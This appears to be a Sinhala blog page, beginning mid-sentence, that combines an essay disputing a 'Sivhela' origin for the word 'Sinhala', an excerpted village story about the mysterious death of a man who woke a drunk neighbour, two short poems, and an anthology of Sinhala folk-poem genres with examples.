නොවේ. මීට හේතුව යක්‍ෂ, නාග, දේව, රාක්‍ෂ ලෙස ජනවර්ග හතරක්‌ නොසීටීමද? නමුත් රාවණා යුගයේ සිටි මෙම යක්‍ෂ, නාග, දේව,රාක්‍ෂ යන සිව් ජාතීන්ගේ එකතුව "සිව්හෙළය" බවත් පසුකාලීනව සිව්හෙළය බවට පත් වූ බවත් හෙළහවුලේ ඇතැම් උගතුන්ගේ මතයකි. එයට ඉතිහාස පදනමක්‌ තිබේද?

ඇත්ත වශයෙන්ම "සිව්හෙළය" නමැති ඉපැරණි වචනයක්‌ පසුකාලීන නූතන වචනය වූ "සිංහළය" සකස්‌ වීමට හේතු වීද? එසේ වී නම් සිව්හෙළය, සිංහලය ලෙස පරිනාමය වීම පිළිබඳ මුල් වචනය හා නූතන වචනය අතර මැද අවස්‌ථාද තිබිය යුතුය. නමුත් පැරණි ප්‍රාකෘත ශිලා ලිපියක හෝ සාහිත්‍ය කෘතියක එබඳු සාධක හමුවී නැත. විශේෂයෙන්ම සිංහලය වෙනුවට සිව්හෙළය භාවිත කළ බවටත් සාධකයක්‌ නැත. යම් සේ සිව්හෙළයේ පරිනාමයකින් සිංහලය ඇති වී නම් මේ වන විට ජනප්‍රිය ව්‍යවහාරයෙන් පරිනාමයට මුල්වූ "සිව්හෙළය" අභාවිත වී ද තිබිය යුතුය. විශේෂයෙන්ම වාග් විද්‍යාවේ "අභ්‍යන්තර ප්‍රතිනිර්මිති" (Internal reconstruction) සහ තුලනාත්මක විධිය (Comparative Method) වැනි පිළිගත් සිද්ධාන්ත අනුව සිව්හෙළය හා සිංහලය අතර පරිනාමීය අවස්‌ථා සඳහා සාධක නැති බැවින් මේ මතය පිළිගත හැකි තත්ත්වයක නැත.

"සිව්" සහ "හෙළ" යන වචන දෙක සන්ධි වී "සිව්හෙළය" හැදෙයිද? "සිව්" යන සංස්‌කෘත භාෂාවේ වචනය අදත් එදත් අංක ගණිතයේදී මිස "සිංහ" නම් සිව්පා සතෙකු සඳහා හෝ ජාතියක්‌ සඳහා හෝ භාවිත නොකරයි. අතීත භාවිතාවන්ද නැත. නමුත් "සිංහ" යන්න වෙනම ප්‍රතාපවත් සිව්පා සතෙකු සඳහා එදත් - අදත් භාවිතා කෙරේ. සිංහල ජාතියේ සංකේතය ලෙස සිංහ රූපයක්‌ භාවිතා කිරීම තුළින්ම සිව්හෙළය සිංහලය වීම ප්‍රතික්‍ෂේප කළ හැක. "හෙළ" යනුවෙන් වෙනම භාෂාවක්‌ හා උසස්‌ ප්‍රාග් ආර්ය ජාතියක්‌ පිළිබඳවද වැදගත් මතයක්‌ නිතර සාකච්ඡා කරයි. ඒ අනුව මෙම හෙළ භාෂාව ආර්යන් ඒමට පෙර මෙහි සිටි ජනතාවගේ භාෂාව ලෙස සැලකේ. ඔවුන් හෙළ භාෂාව රාවණා යුගය තෙක්‌ දුරාතීතයක්‌ කරා යොමු කරයි. මෙම "හෙළ" යන වචනයේ සැබෑ අරුත කුමක්‌ද? මේ සඳහා දැනට ඇති පැරණිම සාධක අනුව බ්‍රාහ්මී ලේඛන වලත්, සීගිරි ගී වලත් "හෙළ" යන වචනය භාවිතාකළ පැරණිම සාධක හමුවිය. සීගිරි ගී සහ බ්‍රාහ්මී ලිපි අනුව එහි අරුත මෙසේය.

1. හෙළ - පර්වතය (පරණවිතාරණ, සෙනරත්, සීගිරි ගී අංක 73)

2. හෙළ - සිංහල / සිහල (පරණවිතාන, සෙනරත්, සීගිරි ගී අංක 293)

3. හෙළ - ආලෝකය/ පැහැදිළි කිරීම (පරණවිතාණ, සෙනරත්, සීගිරි ගී අංක 439)

4. හෙල් - ශ්වේත / සුදු (පරණවිතාන, සෙනරත්, සීගිරි ගී අංක 537)

5. හෙල්දිව - සිංහල ද්වීපය (E ZZ, 1.20 - 12)

(උපුටා ගැනීම, සෙල්ලිපි වදන් අකාරාදී - මහාචාර්ය - සිරිමල් රණවැල්ල මහතා)

සීගිරි ගී සහ බ්‍රාහ්මී ලිපි අනුව හෙළ යන්න ඉහළ, ආලෝකමත්, පිරිසිදු වැනි අරුතක්‌ දෙන නාම විශේෂණයක්‌ ලෙස භාවිතා කර ඇත. පසුව හෙල්දිව වැනි වචනවල, "දිව" (දිවයින/ දූපත) යන වචනයේ මුලට "හෙළ" යොදා ඇත්තේ "උසස්‌/ පිවිතුරු දූපත" යන අරුතිනි. එය කවි සිතිවිල්ලක්‌ මිස රටේ නම නොවේ. මේ නිසා "හෙළ" නාම විශේෂණ පදයකි. සිංහ සහ හෙළ එකතුවීමෙන් (සිංහල ++හෙළ) සිංහල සෑදුන බව ඇතමෙකු අදහති. නමුත් "හෙළ" නාම විශේෂණයක්‌ නිසා "සිංහ" නම් නාම පදයට පසුව "හෙළ" නම් නාම විශේෂණය යෙදීම පිළිගැනීමට අසීරුය. මන්ද සිංහල භාෂාවේ නාම විශේෂණය ප්‍රකෘති ස්‌වභාවයෙන් නාම පදයේ මුලට යෙදීම සාමාන්‍ය ක්‍රමයයි. මෙතැන එය රීතියට පටහැනිය. එම නිසා සිංහ යන වචනයේ අගට හෙළ එකතුවීම වාග් විද්‍යාත්මකව හෝ ව්‍යාකරණ රීති අනුව හෝ පිළිගත නොහැක. "සිව්හෙළය" නමැති වදන ඇත්ත වශයෙන්ම සිංහලයටද වඩා පසු කාලීනව නූතන භාවිතයට හෙළ හවුල හඳුන්වා දුන් වචනයකි. වඩා අලුත් එකින් වඩා පැරණි එක හැදුන බව කීම ශාස්‌ත්‍රීය නැත. "සිව්හෙළය" වඩා අලුත් එකය. "සිංහලය" වඩා පැරණි එකය. යම් හෙයකින් "සිව්හෙළය" සිංහල බවට පත්වීම කියයි නම් එය, දුවගෙන් අම්මා උපන් බව කීමකි. මෙලෙස හෙළ ජාතියක පුරාණ පැවත්ම බිඳවැටීමට සමාන්තරව රාවණා පුරාවෘත්තය සහතික කිරීමට අවශ්‍ය භාෂා පදනමද බිඳ වැටෙයි

බඩාමද මැරුවේ..?


"බඩා පුතේ... මොකද බං මේ මහ රෑ පාර මැද්දේ නිදි..බලහං වාහනයක් එහෙම ගියොත් උඹට මොකද වෙන්නේ..නැගිටලා ගෙදර පලයං..ගෙදර ගිහින් නිදා ගනින්.."

පොඩි මුදලාලි බාප්පා එසේ කීවේ මහ රෑ තාර පාර මැද වෙරි මතෙන් වැටී නිදා සිටි බඩාටය... ඒ බඩාගේම හොඳට මිස වෙන යමකට නොවේ.. එහෙත් ඒ වදන් ටිකම පොඩි මුදලාලි බාප්පාට නරකට හිටී යැයි ඔහු හීනෙන්වත් නොසිතන්නට ඇත...

බීලා වැඩි වී ඉඳ හිට වාහනයක් දෙකක් යන එන පාළු තාර පාරේ වැටී නිදියන බඩාට පාරේ යන වාහනයකින් වන අනතුරක් වැලැක්වීමට සිතූ පොඩි මුදලාලි බාප්පා ජීවත් වූ අවසාන රැය..අවසාන පැය කිහිපය... එය විය...

---------------------------------

පොඩි මුදලාලි...

මා දන්නා කාලයක නම් ඔහු කල වෙළදාමක් නැත.. එහෙත් ඔහුව හඳුන්වන්නට මුදලාලි කෑල්ල භාවිතා විය... ඒ අප ඉපදෙන්නටත් වර්ෂ ගණනාවකට කලින් ඔහුගේ තරුණ කාලයේදී කුඩාවට කල සිල්ලර කඩයක් හේතුවෙනි... එහෙත් එම කඩ කෙරුවාව වැඩි කලක් නොකල හෙතෙම වෙනත් වෙනත් දේ කරමින් සිය ජීවිකාව සකස් කර ගන්නා ලදි...

කිසිවකුට යටහත් නොවී සිය වෙහෙස මහන්සියෙන් ලී කොටන් සමඟ ඔට්ටු වී ගතමනාවක් හොයාගෙන එදා වේල සරි කර ගත් මුදලාලි බාප්පාට දරුවන් පස් දෙනෙකු විය.. එයින් වැඩිමහළු දරුවන් සිව් දෙනාම මට වඩා වයසින් වැඩි මහළු වූ අතර බාලම පිරිමි දරුවා අප සමඟ එකට කෙලි සෙල්ලම් කරනු ලැබූ අතර ඔහු මට වඩා අවුරුද්දකින් වයස්ගත විය... පවුලේ බාලයා වූ එකම දියණිය ඉගෙනීමට දක්ෂතා ඇති දරුවෙකු වූ අතර පවුලේ තුන් වැනි දරුවාත් එසේම ඉගෙනුමට ස‍මතෙක් විය...

ඒ හැර අනිත් දරුවන් වූ වැඩි මාළු දරුවන් දෙදෙනාත්.. අප හා කෙලි සෙල්ලම් කල මිතුරාත් එතරම්ම ඉගෙනුමට බර නොවීය...නමුත් යම් තරමකින් ඒ සියල්ලෝම අධ්‍යාපනය ලබන ලදි...  කෙසේ වෙතත් ඔවුන් සියළු දෙනාම එකට එකතු වී බොහෝ සාමකාමීව දිවි ගෙවනු ලැබූ බව නම් මතකයේ ඇත.

මුදලාලි බාප්පාගේ නිවස තිබුනේ මහ පාරෙන් හැරී කුඩා දෙවට පාරක් දිගේ මීටර් සීයයක් පමණ ගිය තැනය... එම දෙවට පාරද එල් හැඩැති වංගුවකින්ද දැඩි බෑවුමකින්ද  සමන්විත වූ බැවින් නිවස තිබූ තැන පාරට පෙනෙන්නේ නැත.. එසේම කෝපි ගස් වලින් දෙපස ගැවසී ගත් නිසා දෙවට පාර සිහින් අඩිපාරකට පමණක් සීමා වී තිබිණි...

කාමර කිහිපයකින් යුතු වැඩ අවසන් නොකල නිවසක් ඔවුනට වූ අතර ගෙට පහළින් වූයේ විශාල වෙල් යායකි... ඔවුන්ගේ නිවස අසලම වෙනත් නිවෙස් නොවූ අතර  මහ පාරෙන් හැරෙන තැන නිවාස කිහිපයක් විය... ඒ හැරුනු කල ඔවුන් ගත කලේ තරමක නිදහස් නිහඩ පරිසරයක වූ ජීවන රටාවකි...

මෙම කාලය වන විට බඩා විවාපත්ව සිටියේය... එසේම තදින්ම බේබදු කමටත් වෙනත් ගැහැණුන් පසුපස යෑමටත් පුරුදුව සිටි කාලයකි... ආර්ථික ප්‍රශ්න වැඩි වෙත්ම බඩා දත් එකම ක්‍රමය වූයේ දවස පුරාම බී ගත්වනම සිටීමයි... රැකියාවක් නොකල ඔහුගේ ආදායම් මාර්ගය වූයේ ගමේ එක් කැලෑ මණ්ඩියක කෙරුණ කසිප්පු පෙරන වැඩට අත් උදවු දීමයි.. එසේ අත් උදව් දීම හරහා නොමිලේම බීමට කසිප්පු ලැබුනු අතර ඉඳහිට ලැබෙන මුදලක්ද විය.. එහෙත් එම මුදලින් කල හැකි වැඩි යමක් නොවීය... වැඩි පුරම සිදු වූයේ එම මුදලින්ද කසිප්පු බීම මිස වෙන යමක් නොවේ...

මේ වන විට සුමුදු අක්කා ගැබ්බරව සිටියා වන්නට ඇත.. ඒ පිළිබඳව මාගේ මතකය එතරම්ම පැහැදිලි නැත... ගෙදරින් පැන ගියාට පසුව සුමුදු අක්කා ජීවත් වූයේ තරමක් වහං වී ගත්වනමය... අප ඔවුන් ජීවත් වූ කුලියට ගත් අබලං කඩ කාමර දෙක අසලින් යන විටක පවා කොතරම් බැලුවත් සුමුදු අක්කා අපට පෙනෙන්නට කිසි විටක පිටතට නොපැමිණියාය... මා පාසල් ගියේ ආවේ සුමුදු අක්කාගේ බාල නැගණියන් දෙදෙනා සමඟ බැවින් ඇය ඔවුනට තමන් ජීවත්වන දුක්ඛිත තත්වය හෙලිවනවාට අකමැත්තෙන්දෝ කිසි විටක අප හමුවේ පෙනී නොසිටියාය...

බඩා සමඟ ආවාට සුමුදු අක්කාට කන්න අදින්න දුන්නේ බඩාගේ සොහොයුරන්ය... විශේෂයෙන්ම බඩාගේ පවුල වෙනුවෙන්ම කැප වී කටයුතු කල පවුලේ දෙවැනි පිරිමි දරුවා වූ  "සනත්" බඩාට බාල සොයුරා විය. හේ පාසල් යන අවධියේ පටන්ම කුලී වැඩ කරමින් හෝ පවුලේ බරට උර දුන් ශක්තිමත් අයකු විය... සිය සහෝදරාදීන්ට කන්න අදින්න දෙනවා මදිවාට වැඩිමාළු සොයුරාගේ පවුලට කන්න අදින්න දීමත් කරන්නට වී තිබුණි.

--------------------------
ඒ එක්දහස් නවසිය අසූව දශකයේ අග භාගය විය... ගම මැදින් වැටුනු තාර පාර තරමක් ප්‍රධාන මාර්ගයක් වූවද දශකයක පමණ කාලයක නොසැලකීම නිසා තාර පොදක් නොවැටී අබලන්ව තිබුණි... එහෙයින් උවමනා වූවත් එහි වේගයෙන් රථ ධාවනය කල නොහැකි විය... එසේ වේගයෙන් රථ වාහන ධාවනයට හැකියාව තිබුණි නම් බඩාගේ අවසානය ලියවෙන්නේ එවැනි වාහනයක ‍රෝද හතර පල්ලේ බව අමුතුවෙන් කිව යුතුව නැත.

උපතින්ම ආ අලුගුත්තේරු ගතියත්.. බේබදුකමත් හා එක්වූ චණ්ඩි පාට් එක නිසා ඔහු ජීවත් වූයේ ඔහුට ඕනෑ ආකාරයටය... බී ගත් පසුව ඔහු නිදියන්නේ මහ පාරේද.. වෙලක් මැදද යන්න ඔහුට වැදගත් නැත.. ඔහු කොතැන වැටුනද අනිත් අය ඔහුට ඉඩදී තම කටයුතු කර ගත යුතුය... මහ පාරේ නිදියාගත් විට එහි යන එන වාහන ඔහුව දුටු පසුව පාරේ අයිනෙන් හෝ ධාවනය කොට ගමන යා යුතු වූවා මිස ඔහුගෙන් ඉඩ ඉල්ලීමට රථයේ නලාව හෝ හැඩවීම යනු අහක යන නයෙක් රෙද්ද අස්සට දමා ගැනීමකි...

ඔහුගේ වග හොඳින්ම දත් ගම් වැසියෝ කිසි විටක බඩා හා කතාවට නොයෑමට වග බලාගත්හ...

බඩාගේ බේබදු රංගනය අපූරු එකකි.. බී ගත් පසු පළමුව ඔහු තමා ඉදිරියට එන සියල්ලන්ටම ආදරය කරන්නට ගනී... එම මොහොතේ ඔහුට හමුවන සියල්ලන්ටම නෑදෑකම කියා ආදරයෙන් ආමණ්ත්‍රණය කරයි... මූණ අත ගායි.. අතින් අල්ලගෙන කියවන්නට පටන් ගනී.. ඉඹින්නට යයි.. තුරුළු කරගනී... ඔහුට හසු වූ කෙනා මේ සියල්ල ඉවසා ගත යුතුය.. වැරදීමකින්වත් තමාට හදිසි බව පවසා එතැනින් යාමට හෝ.. බඩා කරන කියන දේට අකමැති බව හැඟ වූවොත් බඩාගේ ආදර ගීතය එතැනින් අවසානය.. එතෙක් වේලා "නැන්දේ මාමේ බාප්පේ අයියේ මල්ලියේ" යනුවෙන් නෑදෑ කම් කියමින් කරනු ලැබූ කතාව එත් ඇසිල්ලකින් රළු පරළු ආකාරයට වෙනස් වෙයි...

"ඈ බොල කැ** තෝ මොන හු**ගේ පුතෙක්ද යකෝ මට එහෙම කියන්න..? තෝ දන්නෑ මේ බඩා කවුද කියලා... කැ* වේ** පුතා.. තෝ මරං කනවා යකෝ..."

යැයි කියමින් ඔහු සිය චණ්ඩි රංගනයට අවතීර්ණ වෙයි.. එවෙලෙට ඔහුගෙන් බේරී පලා යාම කල හැක්කේ එහෙමත් අයෙකුටය.. නැතිනම් සිදුවන්නේ ගුටි ඇන ගන්නටය... කෙසේ හෝ බේරී පැන ගත්තද එයින් පසුව ඔහු නිතර විමසිල්ලෙන් සිටිය යුත්තේ බඩා බී ගත් වාරයක් වාරයක් පාසාම පරණ සිද්ධි සිහි කොට තරහා කාරයින් සොයා යන ගතියක් තිබූ නිසාය...

එහෙවු බඩා ගැන මුදලාලි බාප්පා නොදැන සිටියා නොවේ... එහෙත් ඉරනම් ගමන යන්නට කැපවී සිටි බාප්පාට එදා වැරදුනි... එසේ හෙයින් දවස පුරා වෙහෙසී සිය කලමනා ආම්පන්නත් රැගෙන නිවසට යන අතර වාරයේ බඩාව ඇහැරවා ගෙදර යැවීමට ඔහු උත්සහ ගන්නේ නැත...
නමුත් කර්ම ශක්තිය සියල්ලටම වඩා ඉහලින් සිටී... ඒ කරුමය විසින් පෙළඹවූ බාප්පා බඩා නැමති සර්පයාව අවදි කරන්නට යෙදුණි... ප්‍රතිඵලය වූයේ පැය කිහිපයකින් පසුව පොඩි මුදලාලි බාප්පාට සිය ජීවිතයෙන් වන්දි ගෙවීමට සිදු වීමය...

එහෙත් එම ඝාතනය සිදු කලේ බඩාමද..?

මුදලාලි බාප්පාගේ ප්‍රාණය නිරුද්ධ සිරුර දෙවැට පාරේ වැටී තිබියදී බඩාගේ සුන් බුන් වූ සිරුර තිබුනේ මුදලාලි බාප්පාගේ පිළිකන්නේය...

එදා රෑ සිද්ධ වූයේ කුමක්ද...?

නීතිය හමුවේ අදටත් නොවිසඳුනු... එහෙත් මුළු ගමක් දන්නා ඒ රහස කුමක්ද..?

උපුටා ගැනීම මාරයාගේ හෝරාව

හුදකලාව........!!!


තනිකඩ මගේ හිත
දෙකඩ වී යන හිරිකඩට
නොදි වීමට සකොබ
මෑත් කර ජනේලය
බැලුවෙමි සබද වට පිට…!!!

පාර පාමුල හිදගෙන
සිඟන්නෙකු ඇත ඇන තබාගෙන
විඩින් විඩ පිටවන
දුම් කැරලි විය
අවතාර ලෙස

සුරුට්ටුව ඇති මුත් ඔහුට
මට නොමැත එවැන්නක් වත් අද
මකන්නට සීතල
කීලිපොලා යන සියොලඟ

“පැෂෝනා” වැල


මනුසත් උයන මැද
සිටියෝය තලතුනා මහතුන්
හැදගෙන ජැන්ඩියට ඇදුමක්
දමමින් කර වටේ ටයි පටිය

අඩි දෙක තුනක් එපිටින්
තුබුනු නෑබුල් “පැෂෝනා” වැල
තව තවත් විලියෙන්
ඇඹරුනා නැගි ක්ෂණික එළියට

දමා සායම්ද යහමින්
කලතා දහඩියේ පදමට
බිවුවෝය ජය පැන
නොබලමින් උන් වට පිට

සිංහල ජනකවි




අතීත ජනයාතමන්ගේ කාන්සියත්,වෙහෙසත් නිවාගැනීම සඳහා යොදාගත් ජන කවිය විවිධ ක්‍ෂේත්‍රයන් , වෘත්තීන් ඔස්සේ නිර්මාණය වී ඇත.මෙම ජනකවි ගැමියාගේ ස්වයං නිර්මාණ වශයෙන් දැක්විය හැකිය. අප මතුන්මිත්තන් සැඟවුණු කුසලතා පිළිබිඹු කරන්නා වූ වටිනා නිර්මාණ වශයෙන් අපේ ජනකවි දැක්විය හැකිය.පහත දක්වා ඇත්තේ අපේ ජනකවි අතරින් තෝරාගත් කිහිපයකි.


1 දරු නැළවිලි කවි
2 වැදි කවි
3 රබන් පද
4 අන්දරේ කී කවි
5 වස් කවි
6 ඔන්චිලි වාරම් කවි
7 කරත්ත කවි
8 පැල් කවි
9 පාරු කවි
10 නෙළුම් කවි
11 පතල් කවි
12 සංදේශ කවි
13 සංවාදාත්මක කවි
14 උපමා කවි
15 උපදේශ කවි
16 කවට කවි
17 සොකරි කවි
18 සෙත් ශාන්ති යාතිකා කවි
19 තේරවිලි කවි
19.1 ප්‍රශ්නය
19.2 පිළිතුර
20 තල මල් කවි
21 උඩැක්කි කවි


දරු නැළවිලි කවි





අතට වළලු කොහෙන් දුවේ
පයට වළලු කොහෙන් දුවේ
ඉඟට හවඩි කොහෙන් දූවේ
දැනට නිදා ගනින් දුවේ





වැදි කවි



තෙන ‍තෙදිනානා තෙදිනානේ - තෙන තෙදිනානා තෙදිනානේ
හීතල වන්නියෙ කෑලිය වැල්ලේ - වැල් කොබ්බෑවල දුන්න නමාගෙන
තෙන තෙදිනානා තෙදිනානේ - තෙන තෙදිනානා තෙදිනානේ
මොරියන් කැච්චක් පි‍ට එල්ලාගෙන - කෑටුන් දෙන්නා ඉච්චර කරගෙන
වන්නියා කොයිබට ගච්චන්නේ - වන්නනියා කොයිබට ගච්චන්නේ
තෙන තෙදිනානා තෙදිනානේ - තෙන තෙදිනානා තෙදිනානේ
වත්තෙන් පැන්නේ මිල්ලානා - වත්තෙන් පැන්නේ දිවුටානා
තෙන තෙදිනානා තෙදිනානේ - තෙන තෙදිනානා තෙදිනානේ




      


රබන් පද


සඳුන් කැලේ
අපි යනකොට
රිලව් පනිනවා
එක රිලවෙක්
බඩ බැඳගෙන
පිනුම් ගහනවා
තක දොං පිනුම් ගහනවා




අන්දරේ කී කවි





අම්මේ මක්ක කියනෙද දැන් නුඹ මෙමට
උඹ කී නිසා හරකෙකු ලෙස      උන්නාට
පුළුවන් තරමටත් වැඩියෙන් උන්නු   මට
නහින්නට කියනවද තව මට ඔය  ලෙසට



වස් කවි





බහින ජලය මෙන් සියගත      ඇදීයන්
නගින ගහෙන් උගුරේ උල     ඇනීයන්
බඳින බැම්ම වල වරපට        කැඩීයන්
කෙමින ගත් හොරා හතරට    පැලීයන්


ඔන්චිලි වාරම් කවි



උඩයන රවුමට පපුවයි දන්                    නේ
පාතට එනකොට නිවිලයි එන්                නේ
පොල්ලක් පැන්නට බය නොසිතන්        නේ
පත්තිනි දෙවිඳුට පින් දීපන්                  නේ







කරත්ත කවි





සසඳ සසඳ හඳ පානේ අපි           යනවා
මම්මල බඳව ගොන් බානක්    දක්කනවා
සකිය සගව්ව‍ට රෝදය කැර      කෙනවා
දත් කැකුළට අපි කුරුණෑගල්       යනවා



පැල් කවි





පැලේ පැදුර සුළඟට වැනි        වැනීයෝ
වැවේ වතුර රැල්ලට සිඳි            සිඳීයෝ
වෙලේ ගොයම පින්නට පැසි    පැසීයෝ
‍අපේ මෙවන් දුක දෙවිඳුට       පෙනීයෝ



පාරු කවි





ගමන් යන්ඩ නැකතින් පාරු පැද    ගෙනේ
සමන් දෙවියන්ඩ පුද පඬුරු බැඳ    ගෙනේ
මෙවන් කළු ගගේ කඳු මුල් බලා    ගෙනේ
අපිත් යමුව සැම දෙවියන්ට වැඳ    ගෙනේ


නෙළුම් කවි



දුම්බර කෙතේ වැට බැඳලා රැකුම් බැලුම්
මාවැලි ගඟේ දිය බැඳලා කෙත‍ට ගිලුම්
බොළඳ ළියන් කර ඔසවා බලන බැලුම්
තුම්පත් රටාවයි දුම්බර කෙතේ නෙලුම්







පතල් කවි






මහ බෝගලට අපි ඇවිදින දුකා
ගැට්ට නැති මුට්ටි පොඩියේ උයා කකා
පනන් විස්ස ණය වෙනකොට සිතේ දුකා
සතර වරම් දෙවි පිහිටෙන් නොවන් දුකා
**
දුම්බර කන්ද පාමුල මිනිරන් පතළේ
බැහැලා බඹ තිහක් කලුගල සිදුරු කළේ
බස්නාහිරට දෝනා දෙක ගමන් කළේ
විස්තර කියමි දුම්බර මිනිරන් පතළේ
**
ඉන්නේ දුම්බරයි මහ කළු ගලක් යට
කන්නේ කරවලයි රට හාලේ බතට
බොන්නේ බොර දියයි පූරුවෙ කළ පවට
යන්නේ කවදාද මව්පිය දකින්නට

සංදේශ කවි






පේරාදෙණියෙ එකසිත් ඇති මහත්වරු
පාලම සදන්නට ගත්තේ යකඩ කරු
ඒවා මැදට ඇණ දුන්නේ ගල් පතුරු
පාලම තිබෙයි මේ කප පවතිනා තුරු


සංවාදාත්මක කවි


රජතුමා

ඔරුව තොටේ ඔරු පදිනා කෙනෙක් නැත
තිරුවා මෙමන් අඹගමුවට යවා ඇත
බොරුව කියා තී රවටා යයි නොසිත
හරුව දොර මෙපුර මහරජ මමය කත

තිරුවා

ඔරුව තොටේ ඔරු පදිනා කෙනෙක් නැත
ඔරුව ලඟට තොට පදිනා කෙනෙක්
පියානන්ට බොරු කියනා කෙනෙක් නැත
තිරුවා මමයි මම අඹගමු ගියේ නැත




තරුණයා

අල්ලගෙන නෙරිය අතකින් කිම්ද නගෝ
වසාගෙන දෙතන අතකින් කිම්ද නගෝ
හිමියෙක් නැති ගමන තනි මග කිම්ද නගෝ
අම්බලමේ ඉඳලා අපි යමුද නගෝ

තරුණිය

අල්ලගෙන නෙරිය මඩ තැවරෙන හින්දා
වසාගෙන දෙතන බිලිඳුගෙ කිරි හින්දා
බාල මස්සිනා පස්සෙන් එන හින්දා
යන්නම් අයියන්ඩි ගම රට දුර හින්දා

උපමා කවි





දිරන තුරු වහල පොල් අත්ත නොබඳිති
ඉරෙන තුරු රෙද්ද තවෙකක් නොම ගනිති
කෙරෙන තුරු යමක් එහි තරම නොදනිති
මැරෙන තුරු ඉගෙන ගන්න දේ තිබෙති






උපදේශ කවි





ගඟ දිය බොරවුණත් කූනිස්සන්ටයි වාසී
ඒ දිය බොරවුණත් කඩයටමයි වාසී
නිල තල වැඩිවුනත් මහතුන්ටයි වාසී
කුලමල නැති වෙන්ඩ අවුසදයක් කාසී

පීල්ලේ දියට කළයක් නැමූවත්
නොපිරේ එය හැට පැයකින් බැලූවත්
ගුණ නැති එකා බණ දහමින් වෙලූවත්
උගේ ගතිය ඌ නාරී මැරූවත්

කවට කවි





මාමයි මමයි වැලි කුඹුරේ හාන කොට
දත්කො‍ට ඇතෙක් එනවා අපි මරන්නට
වටපිට බැලිමි ගසකුත් නැත නගින්නට
පිටපට ගසා පැන්නෙමි මාමගෙ කරට



සොකරි කවි





යාලක් විතර වී අව්වේ වනාලා
දොළසක් විතර ඇඟ ගෝමර ඉසීලා
අතක් දිගට නිල් වරලස මිදීලා
සොකරි සිටිති වී අව්වේ වනාලා




සෙත් ශාන්ති යාතිකා කවි





කළු කපුටා සුදු වන තුරු
මෝල් පිල්ල ලියලන තුරු
ඉඟුරු ඇස්ස පැලවෙන තුරු
එකසිය විස්සට දෙසිය විස්සක්
ආයුබෝ වේවා !



තේරවිලි කවි



ප්‍රශ්නය
දෙපා දෙකෙන් දුර ගමනක් බෑ හේමා
නෙත් දෙකකුත් ඇත නිදිමත නැත හේමා
කුස තුල බඩගිනි උන්දෑට නැත හේමා
මෙතුන් පසේ තෝරන්නට බෑ හේමා

පිළිතුර
වනන්ත‍රේ ගල් උණූවෙනවා හේමා
ගමේ කම්මලේ මිටියෙන් වැඩ ‍හේමා
ජල බොර දියෙන් පණ රැකුණා හේමා
මෙතුන් පදේ ගිරයට කිව්වා හේමා


තල මල් කවි





සඳ විලසින් සඳ මඩල ලෙසින් එම රැස් විලසින් මල් වට දිලෙනා
දඹ ගෙතුමෙන් මුතු පබලු පෙලින් පෙළ කිනිති බරින් මල් වට දිලෙනා
නද කරමින් වීණාව නදින් බිඟුරොන් ගනිමින් ගුවනේ තිබුනා
සොඳ රුවනින් තලමල මෙලෙසින් සක්වල සතොසින් ඒ මල පිපුනා



උඩැක්කි කවි




‍පෙර බුදු මඟුලට ගැසූ උඩැක්කිය
ඒ බුදු මඟුල‍ට ගැසූ උඩැක්කිය
සතර වරම් සැමටා දෙවි   සක්කිය
ගුරුනි දෙවන් මට බුද්ද   උඩැක්කිය